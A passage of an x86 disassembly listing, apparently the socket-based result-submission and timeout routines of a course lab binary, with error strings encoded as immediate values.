8049498: e8 c3 f4 ff ff call 8048960
804949d: b8 ff ff ff ff mov $0xffffffff,%eax
80494a2: e9 7b 06 00 00 jmp 8049b22
80494a7: 8d 75 d8 lea -0x28(%ebp),%esi
80494aa: c7 45 d8 00 00 00 00 movl $0x0,-0x28(%ebp)
80494b1: c7 45 dc 00 00 00 00 movl $0x0,-0x24(%ebp)
80494b8: c7 45 e0 00 00 00 00 movl $0x0,-0x20(%ebp)
80494bf: c7 45 e4 00 00 00 00 movl $0x0,-0x1c(%ebp)
80494c6: 66 c7 45 d8 02 00 movw $0x2,-0x28(%ebp)
80494cc: 8b 50 0c mov 0xc(%eax),%edx
80494cf: 89 54 24 08 mov %edx,0x8(%esp)
80494d3: 8d 55 dc lea -0x24(%ebp),%edx
80494d6: 89 54 24 04 mov %edx,0x4(%esp)
80494da: 8b 40 10 mov 0x10(%eax),%eax
80494dd: 8b 00 mov (%eax),%eax
80494df: 89 04 24 mov %eax,(%esp)
80494e2: e8 09 f3 ff ff call 80487f0
80494e7: 0f b7 45 0c movzwl 0xc(%ebp),%eax
80494eb: 66 c1 c8 08 ror $0x8,%ax
80494ef: 66 89 45 da mov %ax,-0x26(%ebp)
80494f3: c7 44 24 08 10 00 00 movl $0x10,0x8(%esp)
80494fa: 00
80494fb: 89 74 24 04 mov %esi,0x4(%esp)
80494ff: 8b 85 b4 5f ff ff mov -0xa04c(%ebp),%eax
8049505: 89 04 24 mov %eax,(%esp)
8049508: e8 43 f4 ff ff call 8048950
804950d: 85 c0 test %eax,%eax
804950f: 79 2f jns 8049540
8049511: 89 7c 24 08 mov %edi,0x8(%esp)
8049515: c7 44 24 04 04 a4 04 movl $0x804a404,0x4(%esp)
804951c: 08
804951d: 8b 45 20 mov 0x20(%ebp),%eax
8049520: 89 04 24 mov %eax,(%esp)
8049523: e8 e8 f3 ff ff call 8048910
8049528: 8b 85 b4 5f ff ff mov -0xa04c(%ebp),%eax
804952e: 89 04 24 mov %eax,(%esp)
8049531: e8 2a f4 ff ff call 8048960
8049536: b8 ff ff ff ff mov $0xffffffff,%eax
804953b: e9 e2 05 00 00 jmp 8049b22
8049540: ba ff ff ff ff mov $0xffffffff,%edx
8049545: 89 df mov %ebx,%edi
8049547: b8 00 00 00 00 mov $0x0,%eax
804954c: 89 d1 mov %edx,%ecx
804954e: f2 ae repnz scas %es:(%edi),%al
8049550: f7 d1 not %ecx
8049552: 89 8d b0 5f ff ff mov %ecx,-0xa050(%ebp)
8049558: 8b 7d 10 mov 0x10(%ebp),%edi
804955b: 89 d1 mov %edx,%ecx
804955d: f2 ae repnz scas %es:(%edi),%al
804955f: 89 8d ac 5f ff ff mov %ecx,-0xa054(%ebp)
8049565: 8b 7d 14 mov 0x14(%ebp),%edi
8049568: 89 d1 mov %edx,%ecx
804956a: f2 ae repnz scas %es:(%edi),%al
804956c: 89 ce mov %ecx,%esi
804956e: f7 d6 not %esi
8049570: 8b 7d 18 mov 0x18(%ebp),%edi
8049573: 89 d1 mov %edx,%ecx
8049575: f2 ae repnz scas %es:(%edi),%al
8049577: 2b b5 ac 5f ff ff sub -0xa054(%ebp),%esi
804957d: 29 ce sub %ecx,%esi
804957f: 8b 8d b0 5f ff ff mov -0xa050(%ebp),%ecx
8049585: 8d 44 49 fd lea -0x3(%ecx,%ecx,2),%eax
8049589: 8d 44 06 7b lea 0x7b(%esi,%eax,1),%eax
804958d: 3d 00 20 00 00 cmp $0x2000,%eax
8049592: 76 7c jbe 8049610
8049594: 8b 45 20 mov 0x20(%ebp),%eax
8049597: c7 00 45 72 72 6f movl $0x6f727245,(%eax)
804959d: c7 40 04 72 3a 20 52 movl $0x52203a72,0x4(%eax)
80495a4: c7 40 08 65 73 75 6c movl $0x6c757365,0x8(%eax)
80495ab: c7 40 0c 74 20 73 74 movl $0x74732074,0xc(%eax)
80495b2: c7 40 10 72 69 6e 67 movl $0x676e6972,0x10(%eax)
80495b9: c7 40 14 20 74 6f 6f movl $0x6f6f7420,0x14(%eax)
80495c0: c7 40 18 20 6c 61 72 movl $0x72616c20,0x18(%eax)
80495c7: c7 40 1c 67 65 2e 20 movl $0x202e6567,0x1c(%eax)
80495ce: c7 40 20 49 6e 63 72 movl $0x72636e49,0x20(%eax)
80495d5: c7 40 24 65 61 73 65 movl $0x65736165,0x24(%eax)
80495dc: c7 40 28 20 53 55 42 movl $0x42555320,0x28(%eax)
80495e3: c7 40 2c 4d 49 54 52 movl $0x5254494d,0x2c(%eax)
80495ea: c7 40 30 5f 4d 41 58 movl $0x58414d5f,0x30(%eax)
80495f1: c7 40 34 42 55 46 00 movl $0x465542,0x34(%eax)
80495f8: 8b 85 b4 5f ff ff mov -0xa04c(%ebp),%eax
80495fe: 89 04 24 mov %eax,(%esp)
8049601: e8 5a f3 ff ff call 8048960
8049606: b8 ff ff ff ff mov $0xffffffff,%eax
804960b: e9 12 05 00 00 jmp 8049b22
8049610: 8d 95 cc 9f ff ff lea -0x6034(%ebp),%edx
8049616: b9 00 08 00 00 mov $0x800,%ecx
804961b: b8 00 00 00 00 mov $0x0,%eax
8049620: 89 d7 mov %edx,%edi
8049622: f3 ab rep stos %eax,%es:(%edi)
8049624: 89 df mov %ebx,%edi
8049626: b9 ff ff ff ff mov $0xffffffff,%ecx
804962b: f2 ae repnz scas %es:(%edi),%al
804962d: f7 d1 not %ecx
804962f: 83 e9 01 sub $0x1,%ecx
8049632: 89 ce mov %ecx,%esi
8049634: 0f 84 05 04 00 00 je 8049a3f
804963a: 89 d7 mov %edx,%edi
804963c: 0f b6 03 movzbl (%ebx),%eax
804963f: 3c 2a cmp $0x2a,%al
8049641: 74 21 je 8049664
8049643: 8d 50 d3 lea -0x2d(%eax),%edx
8049646: 80 fa 01 cmp $0x1,%dl
8049649: 76 19 jbe 8049664
804964b: 3c 5f cmp $0x5f,%al
804964d: 74 15 je 8049664
804964f: 8d 50 d0 lea -0x30(%eax),%edx
8049652: 80 fa 09 cmp $0x9,%dl
8049655: 76 0d jbe 8049664
8049657: 89 c2 mov %eax,%edx
8049659: 83 e2 df and $0xffffffdf,%edx
804965c: 83 ea 41 sub $0x41,%edx
804965f: 80 fa 19 cmp $0x19,%dl
8049662: 77 07 ja 804966b
8049664: 8d 57 01 lea 0x1(%edi),%edx
8049667: 88 07 mov %al,(%edi)
8049669: eb 59 jmp 80496c4
804966b: 3c 20 cmp $0x20,%al
804966d: 75 08 jne 8049677
804966f: 8d 57 01 lea 0x1(%edi),%edx
8049672: c6 07 2b movb $0x2b,(%edi)
8049675: eb 4d jmp 80496c4
8049677: 8d 50 e0 lea -0x20(%eax),%edx
804967a: 80 fa 5f cmp $0x5f,%dl
804967d: 76 08 jbe 8049687
804967f: 3c 09 cmp $0x9,%al
8049681: 0f 85 1d 04 00 00 jne 8049aa4
8049687: 0f b6 c0 movzbl %al,%eax
804968a: 89 44 24 08 mov %eax,0x8(%esp)
804968e: c7 44 24 04 18 a5 04 movl $0x804a518,0x4(%esp)
8049695: 08
8049696: 8d 85 c0 5f ff ff lea -0xa040(%ebp),%eax
804969c: 89 04 24 mov %eax,(%esp)
804969f: e8 6c f2 ff ff call 8048910
80496a4: 0f b6 85 c0 5f ff ff movzbl -0xa040(%ebp),%eax
80496ab: 88 07 mov %al,(%edi)
80496ad: 0f b6 85 c1 5f ff ff movzbl -0xa03f(%ebp),%eax
80496b4: 88 47 01 mov %al,0x1(%edi)
80496b7: 8d 57 03 lea 0x3(%edi),%edx
80496ba: 0f b6 85 c2 5f ff ff movzbl -0xa03e(%ebp),%eax
80496c1: 88 47 02 mov %al,0x2(%edi)
80496c4: 83 c3 01 add $0x1,%ebx
80496c7: 83 ee 01 sub $0x1,%esi
80496ca: 0f 84 6f 03 00 00 je 8049a3f
80496d0: 89 d7 mov %edx,%edi
80496d2: e9 65 ff ff ff jmp 804963c
80496d7: 89 5c 24 08 mov %ebx,0x8(%esp)
80496db: 89 74 24 04 mov %esi,0x4(%esp)
80496df: 89 3c 24 mov %edi,(%esp)
80496e2: e8 a9 f1 ff ff call 8048890
80496e7: 85 c0 test %eax,%eax
80496e9: 7f 0f jg 80496fa
80496eb: e8 f0 f1 ff ff call 80488e0 <__errno_location@plt>
80496f0: 83 38 04 cmpl $0x4,(%eax)
80496f3: 75 15 jne 804970a
80496f5: b8 00 00 00 00 mov $0x0,%eax
80496fa: 01 c6 add %eax,%esi
80496fc: 29 c3 sub %eax,%ebx
80496fe: 75 d7 jne 80496d7
8049700: 8b bd b0 5f ff ff mov -0xa050(%ebp),%edi
8049706: 85 ff test %edi,%edi
8049708: 79 67 jns 8049771
804970a: 8b 45 20 mov 0x20(%ebp),%eax
804970d: c7 00 45 72 72 6f movl $0x6f727245,(%eax)
8049713: c7 40 04 72 3a 20 43 movl $0x43203a72,0x4(%eax)
804971a: c7 40 08 6c 69 65 6e movl $0x6e65696c,0x8(%eax)
8049721: c7 40 0c 74 20 75 6e movl $0x6e752074,0xc(%eax)
8049728: c7 40 10 61 62 6c 65 movl $0x656c6261,0x10(%eax)
804972f: c7 40 14 20 74 6f 20 movl $0x206f7420,0x14(%eax)
8049736: c7 40 18 77 72 69 74 movl $0x74697277,0x18(%eax)
804973d: c7 40 1c 65 20 74 6f movl $0x6f742065,0x1c(%eax)
8049744: c7 40 20 20 74 68 65 movl $0x65687420,0x20(%eax)
804974b: c7 40 24 20 73 65 72 movl $0x72657320,0x24(%eax)
8049752: c7 40 28 76 65 72 00 movl $0x726576,0x28(%eax)
8049759: 8b 85 b4 5f ff ff mov -0xa04c(%ebp),%eax
804975f: 89 04 24 mov %eax,(%esp)
8049762: e8 f9 f1 ff ff call 8048960
8049767: b8 ff ff ff ff mov $0xffffffff,%eax
804976c: e9 b1 03 00 00 jmp 8049b22
8049771: 8b 85 b4 5f ff ff mov -0xa04c(%ebp),%eax
8049777: 89 85 cc df ff ff mov %eax,-0x2034(%ebp)
804977d: c7 85 d0 df ff ff 00 movl $0x0,-0x2030(%ebp)
8049784: 00 00 00
8049787: 8d 85 d8 df ff ff lea -0x2028(%ebp),%eax
804978d: 89 85 d4 df ff ff mov %eax,-0x202c(%ebp)
8049793: b9 00 20 00 00 mov $0x2000,%ecx
8049798: 8d 95 cc bf ff ff lea -0x4034(%ebp),%edx
804979e: 8d 85 cc df ff ff lea -0x2034(%ebp),%eax
80497a4: e8 2d fb ff ff call 80492d6
80497a9: 85 c0 test %eax,%eax
80497ab: 7f 7b jg 8049828
80497ad: 8b 45 20 mov 0x20(%ebp),%eax
80497b0: c7 00 45 72 72 6f movl $0x6f727245,(%eax)
80497b6: c7 40 04 72 3a 20 43 movl $0x43203a72,0x4(%eax)
80497bd: c7 40 08 6c 69 65 6e movl $0x6e65696c,0x8(%eax)
80497c4: c7 40 0c 74 20 75 6e movl $0x6e752074,0xc(%eax)
80497cb: c7 40 10 61 62 6c 65 movl $0x656c6261,0x10(%eax)
80497d2: c7 40 14 20 74 6f 20 movl $0x206f7420,0x14(%eax)
80497d9: c7 40 18 72 65 61 64 movl $0x64616572,0x18(%eax)
80497e0: c7 40 1c 20 66 69 72 movl $0x72696620,0x1c(%eax)
80497e7: c7 40 20 73 74 20 68 movl $0x68207473,0x20(%eax)
80497ee: c7 40 24 65 61 64 65 movl $0x65646165,0x24(%eax)
80497f5: c7 40 28 72 20 66 72 movl $0x72662072,0x28(%eax)
80497fc: c7 40 2c 6f 6d 20 73 movl $0x73206d6f,0x2c(%eax)
8049803: c7 40 30 65 72 76 65 movl $0x65767265,0x30(%eax)
804980a: 66 c7 40 34 72 00 movw $0x72,0x34(%eax)
8049810: 8b 85 b4 5f ff ff mov -0xa04c(%ebp),%eax
8049816: 89 04 24 mov %eax,(%esp)
8049819: e8 42 f1 ff ff call 8048960
804981e: b8 ff ff ff ff mov $0xffffffff,%eax
8049823: e9 fa 02 00 00 jmp 8049b22
8049828: 8d 85 c8 5f ff ff lea -0xa038(%ebp),%eax
804982e: 89 44 24 10 mov %eax,0x10(%esp)
8049832: 8d 85 c8 7f ff ff lea -0x8038(%ebp),%eax
8049838: 89 44 24 0c mov %eax,0xc(%esp)
804983c: 8d 85 cc 7f ff ff lea -0x8034(%ebp),%eax
8049842: 89 44 24 08 mov %eax,0x8(%esp)
8049846: c7 44 24 04 1f a5 04 movl $0x804a51f,0x4(%esp)
804984d: 08
804984e: 8d 85 cc bf ff ff lea -0x4034(%ebp),%eax
8049854: 89 04 24 mov %eax,(%esp)
8049857: e8 54 f0 ff ff call 80488b0 <__isoc99_sscanf@plt>
804985c: 8b 85 c8 7f ff ff mov -0x8038(%ebp),%eax
8049862: 3d c8 00 00 00 cmp $0xc8,%eax
8049867: 0f 84 c5 00 00 00 je 8049932
804986d: 8d 95 c8 5f ff ff lea -0xa038(%ebp),%edx
8049873: 89 54 24 0c mov %edx,0xc(%esp)
8049877: 89 44 24 08 mov %eax,0x8(%esp)
804987b: c7 44 24 04 2c a4 04 movl $0x804a42c,0x4(%esp)
8049882: 08
8049883: 8b 45 20 mov 0x20(%ebp),%eax
8049886: 89 04 24 mov %eax,(%esp)
8049889: e8 82 f0 ff ff call 8048910
804988e: 8b 85 b4 5f ff ff mov -0xa04c(%ebp),%eax
8049894: 89 04 24 mov %eax,(%esp)
8049897: e8 c4 f0 ff ff call 8048960
804989c: b8 ff ff ff ff mov $0xffffffff,%eax
80498a1: e9 7c 02 00 00 jmp 8049b22
80498a6: b9 00 20 00 00 mov $0x2000,%ecx
80498ab: 8d 95 cc bf ff ff lea -0x4034(%ebp),%edx
80498b1: 8d 85 cc df ff ff lea -0x2034(%ebp),%eax
80498b7: e8 1a fa ff ff call 80492d6
80498bc: 85 c0 test %eax,%eax
80498be: 7f 72 jg 8049932
80498c0: 8b 45 20 mov 0x20(%ebp),%eax
80498c3: c7 00 45 72 72 6f movl $0x6f727245,(%eax)
80498c9: c7 40 04 72 3a 20 43 movl $0x43203a72,0x4(%eax)
80498d0: c7 40 08 6c 69 65 6e movl $0x6e65696c,0x8(%eax)
80498d7: c7 40 0c 74 20 75 6e movl $0x6e752074,0xc(%eax)
80498de: c7 40 10 61 62 6c 65 movl $0x656c6261,0x10(%eax)
80498e5: c7 40 14 20 74 6f 20 movl $0x206f7420,0x14(%eax)
80498ec: c7 40 18 72 65 61 64 movl $0x64616572,0x18(%eax)
80498f3: c7 40 1c 20 68 65 61 movl $0x61656820,0x1c(%eax)
80498fa: c7 40 20 64 65 72 73 movl $0x73726564,0x20(%eax)
8049901: c7 40 24 20 66 72 6f movl $0x6f726620,0x24(%eax)
8049908: c7 40 28 6d 20 73 65 movl $0x6573206d,0x28(%eax)
804990f: c7 40 2c 72 76 65 72 movl $0x72657672,0x2c(%eax)
8049916: c6 40 30 00 movb $0x0,0x30(%eax)
804991a: 8b 85 b4 5f ff ff mov -0xa04c(%ebp),%eax
8049920: 89 04 24 mov %eax,(%esp)
8049923: e8 38 f0 ff ff call 8048960
8049928: b8 ff ff ff ff mov $0xffffffff,%eax
804992d: e9 f0 01 00 00 jmp 8049b22
8049932: 80 bd cc bf ff ff 0d cmpb $0xd,-0x4034(%ebp)
8049939: 0f 85 67 ff ff ff jne 80498a6
804993f: 80 bd cd bf ff ff 0a cmpb $0xa,-0x4033(%ebp)
8049946: 0f 85 5a ff ff ff jne 80498a6
804994c: 80 bd ce bf ff ff 00 cmpb $0x0,-0x4032(%ebp)
8049953: 0f 85 4d ff ff ff jne 80498a6
8049959: b9 00 20 00 00 mov $0x2000,%ecx
804995e: 8d 95 cc bf ff ff lea -0x4034(%ebp),%edx
8049964: 8d 85 cc df ff ff lea -0x2034(%ebp),%eax
804996a: e8 67 f9 ff ff call 80492d6
804996f: 85 c0 test %eax,%eax
8049971: 7f 7c jg 80499ef
8049973: 8b 45 20 mov 0x20(%ebp),%eax
8049976: c7 00 45 72 72 6f movl $0x6f727245,(%eax)
804997c: c7 40 04 72 3a 20 43 movl $0x43203a72,0x4(%eax)
8049983: c7 40 08 6c 69 65 6e movl $0x6e65696c,0x8(%eax)
804998a: c7 40 0c 74 20 75 6e movl $0x6e752074,0xc(%eax)
8049991: c7 40 10 61 62 6c 65 movl $0x656c6261,0x10(%eax)
8049998: c7 40 14 20 74 6f 20 movl $0x206f7420,0x14(%eax)
804999f: c7 40 18 72 65 61 64 movl $0x64616572,0x18(%eax)
80499a6: c7 40 1c 20 73 74 61 movl $0x61747320,0x1c(%eax)
80499ad: c7 40 20 74 75 73 20 movl $0x20737574,0x20(%eax)
80499b4: c7 40 24 6d 65 73 73 movl $0x7373656d,0x24(%eax)
80499bb: c7 40 28 61 67 65 20 movl $0x20656761,0x28(%eax)
80499c2: c7 40 2c 66 72 6f 6d movl $0x6d6f7266,0x2c(%eax)
80499c9: c7 40 30 20 73 65 72 movl $0x72657320,0x30(%eax)
80499d0: c7 40 34 76 65 72 00 movl $0x726576,0x34(%eax)
80499d7: 8b 85 b4 5f ff ff mov -0xa04c(%ebp),%eax
80499dd: 89 04 24 mov %eax,(%esp)
80499e0: e8 7b ef ff ff call 8048960
80499e5: b8 ff ff ff ff mov $0xffffffff,%eax
80499ea: e9 33 01 00 00 jmp 8049b22
80499ef: 8d 85 cc bf ff ff lea -0x4034(%ebp),%eax
80499f5: 89 44 24 04 mov %eax,0x4(%esp)
80499f9: 8b 45 20 mov 0x20(%ebp),%eax
80499fc: 89 04 24 mov %eax,(%esp)
80499ff: e8 fc ed ff ff call 8048800
8049a04: 8b 85 b4 5f ff ff mov -0xa04c(%ebp),%eax
8049a0a: 89 04 24 mov %eax,(%esp)
8049a0d: e8 4e ef ff ff call 8048960
8049a12: 8b 45 20 mov 0x20(%ebp),%eax
8049a15: 0f b6 00 movzbl (%eax),%eax
8049a18: 83 e8 4f sub $0x4f,%eax
8049a1b: 75 13 jne 8049a30
8049a1d: 8b 45 20 mov 0x20(%ebp),%eax
8049a20: 0f b6 40 01 movzbl 0x1(%eax),%eax
8049a24: 83 e8 4b sub $0x4b,%eax
8049a27: 75 07 jne 8049a30
8049a29: 8b 45 20 mov 0x20(%ebp),%eax
8049a2c: 0f b6 40 02 movzbl 0x2(%eax),%eax
8049a30: 85 c0 test %eax,%eax
8049a32: 0f 95 c0 setne %al 1334 | 8049a35: 0f b6 c0 movzbl %al,%eax 1335 | 8049a38: f7 d8 neg %eax 1336 | 8049a3a: e9 e3 00 00 00 jmp 8049b22 1337 | 8049a3f: 8d 85 cc 9f ff ff lea -0x6034(%ebp),%eax 1338 | 8049a45: 89 44 24 14 mov %eax,0x14(%esp) 1339 | 8049a49: 8b 45 18 mov 0x18(%ebp),%eax 1340 | 8049a4c: 89 44 24 10 mov %eax,0x10(%esp) 1341 | 8049a50: 8b 45 14 mov 0x14(%ebp),%eax 1342 | 8049a53: 89 44 24 0c mov %eax,0xc(%esp) 1343 | 8049a57: 8b 45 10 mov 0x10(%ebp),%eax 1344 | 8049a5a: 89 44 24 08 mov %eax,0x8(%esp) 1345 | 8049a5e: c7 44 24 04 5c a4 04 movl $0x804a45c,0x4(%esp) 1346 | 8049a65: 08 1347 | 8049a66: 8d bd cc bf ff ff lea -0x4034(%ebp),%edi 1348 | 8049a6c: 89 3c 24 mov %edi,(%esp) 1349 | 8049a6f: e8 9c ee ff ff call 8048910 1350 | 8049a74: b8 00 00 00 00 mov $0x0,%eax 1351 | 8049a79: b9 ff ff ff ff mov $0xffffffff,%ecx 1352 | 8049a7e: f2 ae repnz scas %es:(%edi),%al 1353 | 8049a80: f7 d1 not %ecx 1354 | 8049a82: 83 e9 01 sub $0x1,%ecx 1355 | 8049a85: 0f 84 e6 fc ff ff je 8049771 1356 | 8049a8b: 89 cb mov %ecx,%ebx 1357 | 8049a8d: 8d b5 cc bf ff ff lea -0x4034(%ebp),%esi 1358 | 8049a93: 89 8d b0 5f ff ff mov %ecx,-0xa050(%ebp) 1359 | 8049a99: 8b bd b4 5f ff ff mov -0xa04c(%ebp),%edi 1360 | 8049a9f: e9 33 fc ff ff jmp 80496d7 1361 | 8049aa4: 8b 7d 20 mov 0x20(%ebp),%edi 1362 | 8049aa7: be a8 a4 04 08 mov $0x804a4a8,%esi 1363 | 8049aac: b8 43 00 00 00 mov $0x43,%eax 1364 | 8049ab1: f7 c7 01 00 00 00 test $0x1,%edi 1365 | 8049ab7: 74 19 je 8049ad2 1366 | 8049ab9: 0f b6 05 a8 a4 04 08 movzbl 0x804a4a8,%eax 1367 | 8049ac0: 88 07 mov %al,(%edi) 1368 | 8049ac2: 8b 45 20 mov 0x20(%ebp),%eax 1369 | 8049ac5: 8d 78 01 lea 0x1(%eax),%edi 1370 | 8049ac8: be a9 a4 04 08 mov $0x804a4a9,%esi 1371 | 8049acd: b8 42 00 00 00 mov $0x42,%eax 1372 | 8049ad2: f7 c7 02 00 00 00 test $0x2,%edi 1373 | 8049ad8: 74 0f je 8049ae9 1374 | 8049ada: 0f b7 16 movzwl (%esi),%edx 1375 | 8049add: 66 89 17 mov %dx,(%edi) 1376 | 8049ae0: 83 c7 02 add $0x2,%edi 1377 | 8049ae3: 83 c6 02 add 
$0x2,%esi 1378 | 8049ae6: 83 e8 02 sub $0x2,%eax 1379 | 8049ae9: 89 c1 mov %eax,%ecx 1380 | 8049aeb: c1 e9 02 shr $0x2,%ecx 1381 | 8049aee: f3 a5 rep movsl %ds:(%esi),%es:(%edi) 1382 | 8049af0: ba 00 00 00 00 mov $0x0,%edx 1383 | 8049af5: a8 02 test $0x2,%al 1384 | 8049af7: 74 0b je 8049b04 1385 | 8049af9: 0f b7 16 movzwl (%esi),%edx 1386 | 8049afc: 66 89 17 mov %dx,(%edi) 1387 | 8049aff: ba 02 00 00 00 mov $0x2,%edx 1388 | 8049b04: a8 01 test $0x1,%al 1389 | 8049b06: 74 07 je 8049b0f 1390 | 8049b08: 0f b6 04 16 movzbl (%esi,%edx,1),%eax 1391 | 8049b0c: 88 04 17 mov %al,(%edi,%edx,1) 1392 | 8049b0f: 8b 85 b4 5f ff ff mov -0xa04c(%ebp),%eax 1393 | 8049b15: 89 04 24 mov %eax,(%esp) 1394 | 8049b18: e8 43 ee ff ff call 8048960 1395 | 8049b1d: b8 ff ff ff ff mov $0xffffffff,%eax 1396 | 8049b22: 81 c4 6c a0 00 00 add $0xa06c,%esp 1397 | 8049b28: 5b pop %ebx 1398 | 8049b29: 5e pop %esi 1399 | 8049b2a: 5f pop %edi 1400 | 8049b2b: 5d pop %ebp 1401 | 8049b2c: c3 ret 1402 | 1403 | 08049b2d : 1404 | 8049b2d: 55 push %ebp 1405 | 8049b2e: 89 e5 mov %esp,%ebp 1406 | 8049b30: 53 push %ebx 1407 | 8049b31: 83 ec 14 sub $0x14,%esp 1408 | 8049b34: 8b 5d 08 mov 0x8(%ebp),%ebx 1409 | 8049b37: 85 db test %ebx,%ebx 1410 | 8049b39: 74 26 je 8049b61 1411 | 8049b3b: 85 db test %ebx,%ebx 1412 | 8049b3d: b8 02 00 00 00 mov $0x2,%eax 1413 | 8049b42: 0f 48 d8 cmovs %eax,%ebx 1414 | 8049b45: c7 44 24 04 b0 92 04 movl $0x80492b0,0x4(%esp) 1415 | 8049b4c: 08 1416 | 8049b4d: c7 04 24 0e 00 00 00 movl $0xe,(%esp) 1417 | 8049b54: e8 57 ec ff ff call 80487b0 1418 | 8049b59: 89 1c 24 mov %ebx,(%esp) 1419 | 8049b5c: e8 5f ec ff ff call 80487c0 1420 | 8049b61: 83 c4 14 add $0x14,%esp 1421 | 8049b64: 5b pop %ebx 1422 | 8049b65: 5d pop %ebp 1423 | 8049b66: c3 ret 1424 | 1425 | 08049b67 : 1426 | 8049b67: 55 push %ebp 1427 | 8049b68: 89 e5 mov %esp,%ebp 1428 | 8049b6a: 57 push %edi 1429 | 8049b6b: 56 push %esi 1430 | 8049b6c: 53 push %ebx 1431 | 8049b6d: 83 ec 2c sub $0x2c,%esp 1432 | 8049b70: 8b 75 08 mov 
0x8(%ebp),%esi 1433 | 8049b73: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp) 1434 | 8049b7a: 00 1435 | 8049b7b: c7 04 24 0d 00 00 00 movl $0xd,(%esp) 1436 | 8049b82: e8 29 ec ff ff call 80487b0 1437 | 8049b87: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp) 1438 | 8049b8e: 00 1439 | 8049b8f: c7 04 24 1d 00 00 00 movl $0x1d,(%esp) 1440 | 8049b96: e8 15 ec ff ff call 80487b0 1441 | 8049b9b: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp) 1442 | 8049ba2: 00 1443 | 8049ba3: c7 04 24 1d 00 00 00 movl $0x1d,(%esp) 1444 | 8049baa: e8 01 ec ff ff call 80487b0 1445 | 8049baf: c7 44 24 08 00 00 00 movl $0x0,0x8(%esp) 1446 | 8049bb6: 00 1447 | 8049bb7: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp) 1448 | 8049bbe: 00 1449 | 8049bbf: c7 04 24 02 00 00 00 movl $0x2,(%esp) 1450 | 8049bc6: e8 55 ed ff ff call 8048920 1451 | 8049bcb: 89 c3 mov %eax,%ebx 1452 | 8049bcd: 85 c0 test %eax,%eax 1453 | 8049bcf: 79 4e jns 8049c1f 1454 | 8049bd1: c7 06 45 72 72 6f movl $0x6f727245,(%esi) 1455 | 8049bd7: c7 46 04 72 3a 20 43 movl $0x43203a72,0x4(%esi) 1456 | 8049bde: c7 46 08 6c 69 65 6e movl $0x6e65696c,0x8(%esi) 1457 | 8049be5: c7 46 0c 74 20 75 6e movl $0x6e752074,0xc(%esi) 1458 | 8049bec: c7 46 10 61 62 6c 65 movl $0x656c6261,0x10(%esi) 1459 | 8049bf3: c7 46 14 20 74 6f 20 movl $0x206f7420,0x14(%esi) 1460 | 8049bfa: c7 46 18 63 72 65 61 movl $0x61657263,0x18(%esi) 1461 | 8049c01: c7 46 1c 74 65 20 73 movl $0x73206574,0x1c(%esi) 1462 | 8049c08: c7 46 20 6f 63 6b 65 movl $0x656b636f,0x20(%esi) 1463 | 8049c0f: 66 c7 46 24 74 00 movw $0x74,0x24(%esi) 1464 | 8049c15: b8 ff ff ff ff mov $0xffffffff,%eax 1465 | 8049c1a: e9 dd 00 00 00 jmp 8049cfc 1466 | 8049c1f: c7 04 24 30 a5 04 08 movl $0x804a530,(%esp) 1467 | 8049c26: e8 15 ed ff ff call 8048940 1468 | 8049c2b: 85 c0 test %eax,%eax 1469 | 8049c2d: 75 2a jne 8049c59 1470 | 8049c2f: c7 44 24 08 30 a5 04 movl $0x804a530,0x8(%esp) 1471 | 8049c36: 08 1472 | 8049c37: c7 44 24 04 d8 a3 04 movl $0x804a3d8,0x4(%esp) 1473 | 8049c3e: 08 1474 | 8049c3f: 89 34 24 mov 
%esi,(%esp) 1475 | 8049c42: e8 c9 ec ff ff call 8048910 1476 | 8049c47: 89 1c 24 mov %ebx,(%esp) 1477 | 8049c4a: e8 11 ed ff ff call 8048960 1478 | 8049c4f: b8 ff ff ff ff mov $0xffffffff,%eax 1479 | 8049c54: e9 a3 00 00 00 jmp 8049cfc 1480 | 8049c59: 8d 7d d8 lea -0x28(%ebp),%edi 1481 | 8049c5c: c7 45 d8 00 00 00 00 movl $0x0,-0x28(%ebp) 1482 | 8049c63: c7 45 dc 00 00 00 00 movl $0x0,-0x24(%ebp) 1483 | 8049c6a: c7 45 e0 00 00 00 00 movl $0x0,-0x20(%ebp) 1484 | 8049c71: c7 45 e4 00 00 00 00 movl $0x0,-0x1c(%ebp) 1485 | 8049c78: 66 c7 45 d8 02 00 movw $0x2,-0x28(%ebp) 1486 | 8049c7e: 8b 50 0c mov 0xc(%eax),%edx 1487 | 8049c81: 89 54 24 08 mov %edx,0x8(%esp) 1488 | 8049c85: 8d 55 dc lea -0x24(%ebp),%edx 1489 | 8049c88: 89 54 24 04 mov %edx,0x4(%esp) 1490 | 8049c8c: 8b 40 10 mov 0x10(%eax),%eax 1491 | 8049c8f: 8b 00 mov (%eax),%eax 1492 | 8049c91: 89 04 24 mov %eax,(%esp) 1493 | 8049c94: e8 57 eb ff ff call 80487f0 1494 | 8049c99: 66 c7 45 da 47 26 movw $0x2647,-0x26(%ebp) 1495 | 8049c9f: c7 44 24 08 10 00 00 movl $0x10,0x8(%esp) 1496 | 8049ca6: 00 1497 | 8049ca7: 89 7c 24 04 mov %edi,0x4(%esp) 1498 | 8049cab: 89 1c 24 mov %ebx,(%esp) 1499 | 8049cae: e8 9d ec ff ff call 8048950 1500 | 8049cb3: 85 c0 test %eax,%eax 1501 | 8049cb5: 79 2f jns 8049ce6 1502 | 8049cb7: c7 44 24 0c 26 47 00 movl $0x4726,0xc(%esp) 1503 | 8049cbe: 00 1504 | 8049cbf: c7 44 24 08 30 a5 04 movl $0x804a530,0x8(%esp) 1505 | 8049cc6: 08 1506 | 8049cc7: c7 44 24 04 ec a4 04 movl $0x804a4ec,0x4(%esp) 1507 | 8049cce: 08 1508 | 8049ccf: 89 34 24 mov %esi,(%esp) 1509 | 8049cd2: e8 39 ec ff ff call 8048910 1510 | 8049cd7: 89 1c 24 mov %ebx,(%esp) 1511 | 8049cda: e8 81 ec ff ff call 8048960 1512 | 8049cdf: b8 ff ff ff ff mov $0xffffffff,%eax 1513 | 8049ce4: eb 16 jmp 8049cfc 1514 | 8049ce6: 89 1c 24 mov %ebx,(%esp) 1515 | 8049ce9: e8 72 ec ff ff call 8048960 1516 | 8049cee: 66 c7 06 4f 4b movw $0x4b4f,(%esi) 1517 | 8049cf3: c6 46 02 00 movb $0x0,0x2(%esi) 1518 | 8049cf7: b8 00 00 00 00 mov $0x0,%eax 1519 | 
